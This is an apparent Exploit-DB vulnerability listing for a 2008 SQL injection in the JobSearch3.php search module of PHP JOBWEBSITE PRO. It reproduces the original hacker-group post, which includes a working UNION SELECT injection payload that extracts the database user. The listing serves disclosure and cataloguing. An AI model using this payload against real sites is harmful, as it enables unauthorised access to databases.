PHP JOBWEBSITE PRO (JobSearch3.php) Remote SQL Injection Vulnerability

vendor:

PHP JOBWEBSITE PRO

by:

JosS

7.5

CVSS

HIGH

Remote SQL Injection

N/A

CWE

Product Name: PHP JOBWEBSITE PRO

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

PHP JOBWEBSITE PRO (JobSearch3.php) Remote SQL Injection Vulnerability

The vulnerability exists in the 'JobSearch3.php' file of the PHP JOBWEBSITE PRO payment software. An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable parameter. This can allow the attacker to gain access to the database and execute arbitrary code.

Mitigation:

N/A

Source

Exploit-DB raw data:

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+          PHP JOBWEBSITE PRO (JobSearch3.php) Remote SQL Injection Vulnerability    +==--
--==+====================================================================================+==--
                          - dreaming of necessity is reason to comply -


[+] Info:

[~] Bug found by JosS
[~] sys-project[at]hotmail.com
[~] http://www.spanish-hackers.com/
[~] EspSeC & Hack0wn!.

[~] Software: PHP JOBWEBSITE PRO (payment)
[~] HomePage: http://www.preproject.com/
[~] Exploit: Remote SQL Injection [High]
[~] Vuln file: JobSearch3.php

[~] /jobseekers/JobSearch3.php (search module)

[+] Exploit:

[~] ' and 1=2 union all select 1,2,3,4,5,user(),7,8,9,0,1,2,3,4,5/*

* In memory of rgod

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+                                       JosS                                         +==--
--==+====================================================================================+==--
                                       [+] [The End]

# milw0rm.com [2008-06-13]